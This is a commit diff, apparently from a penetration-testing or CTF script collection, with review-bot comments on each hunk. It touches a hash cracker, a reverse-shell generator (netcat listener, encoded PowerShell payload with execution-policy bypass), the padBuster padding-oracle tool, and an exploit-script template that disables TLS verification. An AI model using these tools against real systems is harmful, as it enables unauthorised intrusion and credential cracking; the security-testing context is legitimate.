Roman Hergenreder 2 years ago
parent
commit
718aaa6f6c
4 changed files with 24 additions and 19 deletions
  1. 4 0
      crack_hash.py
  2. 4 1
      genRevShell.py
  3. 1 1
      padBuster.pl
  4. 15 17
      template.py

+ 4 - 0
crack_hash.py

@@ -33,6 +33,8 @@ class HashType(enum.Enum):
     RAW_SHA2_256 = 1400
     SHA256_PASS_SALT = 1410
     SHA256_SALT_PASS = 1420
+    HMAC_SHA256_PASS = 1450
+    HMAC_SHA256_SALT = 1460
     RAW_SHA2_384 = 10800
     RAW_SHA2_512 = 1700
     SHA512_PASS_SALT = 1710
@@ -181,6 +183,8 @@ class Hash:
                 if self.isSalted:
                     self.type.append(HashType.SHA256_PASS_SALT)
                     self.type.append(HashType.SHA256_SALT_PASS)
+                    self.type.append(HashType.HMAC_SHA256_PASS)
+                    self.type.append(HashType.HMAC_SHA256_SALT)
                 else:
                     self.type.append(HashType.RAW_SHA2_256)
                     self.type.append(HashType.RAW_SHA3_256)
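Review bot: The two new HashType members and the two new `self.type.append` lines carry no comment saying what distinguishes 1450 from 1460, whereas the existing names (`SHA256_PASS_SALT` vs `SHA256_SALT_PASS`) encode the difference in the name itself. If these values follow hashcat's mode table, 1450 is HMAC-SHA256 keyed with the password and 1460 keyed with the salt; a trailing comment such as `HMAC_SHA256_PASS = 1450  # HMAC key = password, message = salt` (and the mirror for 1460) would make the naming unambiguous. Appending both only under `if self.isSalted:` looks right, since each mode needs a second input besides the password. The enclosing `Hash` method starts before the second hunk, so the rest of the type-detection logic is not visible here.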

+ 4 - 1
genRevShell.py

@@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
         payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
         return f"powershell.exe -exec bypass -enc {payload_encoded}"
 
+def spawn_listener(port):
+    pty.spawn(["nc", "-lvvp", str(port)])
+
 def triggerShell(func, port):
     def _wait_and_exec():
         time.sleep(1.5)
         func()
 
     threading.Thread(target=_wait_and_exec).start()
-    pty.spawn(["nc", "-lvvp", str(port)])
+    spawn_listener(port)
 
 
 if __name__ == "__main__":
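Review bot: `spawn_listener` is introduced as a module-level function with no docstring, and nothing states that it blocks: `pty.spawn` does not return until the child exits, so the caller in `triggerShell` is held for the whole session after the thread is started. Suggest `"""Run a netcat listener on `port` inside a pseudo-terminal; blocks until it exits."""`. Because the command runs in a forked child, a missing `nc` binary presumably surfaces only as the child exiting at once; a `shutil.which("nc")` check that raises a clear error before `pty.spawn` would make that failure visible, though it needs a `shutil` import outside the hunk. `triggerShell` is fully visible; the `if __name__ == "__main__":` block continues past the hunk.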

+ 1 - 1
padBuster.pl

@@ -527,7 +527,7 @@ sub processBlock {
 
 				my $continue = "y";
 
-				if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
+				if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
 					# This is for autoretry logic (only works on the first byte)
 					if ($autoRetry == 1 &&  ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
 						$hasHit++;
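Review bot: The added `$location !~ /$error/` interpolates `$error` as a regular expression, as the existing `$content` test already does; if the error string is meant to match literally, both should use `\Q$error\E` so that characters like `.` or `(` in a user-supplied error string do not alter the match. If `$location` can be undefined for responses without a Location header, the new `!~` would emit an uninitialized-value warning under `use warnings`; `(!defined $location || $location !~ /$error/)` avoids that, assuming an absent header should count as no error match. `processBlock` starts and ends outside the hunk, so where `$location` is assigned is not visible here.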

+ 15 - 17
template.py

@@ -5,36 +5,34 @@ import sys
 def generateTemplate(baseUrl):
     template = """#!/usr/bin/env python
 
+import os
 import sys
 import json
 import base64
 import requests
+import subprocess
+import urllib.parse
 from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver
+from hackingscripts import util, fileserver, genRevShell
 
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
-USERNAME = "admin"
-PASSWORD = "password"
-
-def login(username, password):
-    session = requests.Session()
-    post_data = { "username": username, "password": password }
-    res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
-    if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
-        print("Login failed")
-        exit()
-    return session
 
-def exploit(session, payload):
-    # Template method to exploit an endpoint
-    pass
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+
+    return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
 
 if __name__ == "__main__":
-    session = login(USERNAME, PASSWORD)
-    exploit(session, "id")
+    pass
 """ % baseUrl
 
     return template
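Review bot: `request()` in the template passes `verify=False` and `allow_redirects=False` explicitly and then `**kwargs`, so a generated script that calls `request("GET", "/login", allow_redirects=True)` or `verify=True` gets `TypeError: got multiple values for keyword argument` instead of the override; make them defaults with `kwargs.setdefault("verify", False)` and `kwargs.setdefault("allow_redirects", False)` before the `client.request(...)` call, which also lets a script turn certificate verification back on where it matters. The three-line session extraction collapses to `client = kwargs.pop("session", requests)`. A one-line docstring stating that `session` is consumed rather than forwarded would help, since the generated script is what users edit. `generateTemplate` is fully within the hunk; these lines are part of the template string it returns, not code executed by this module.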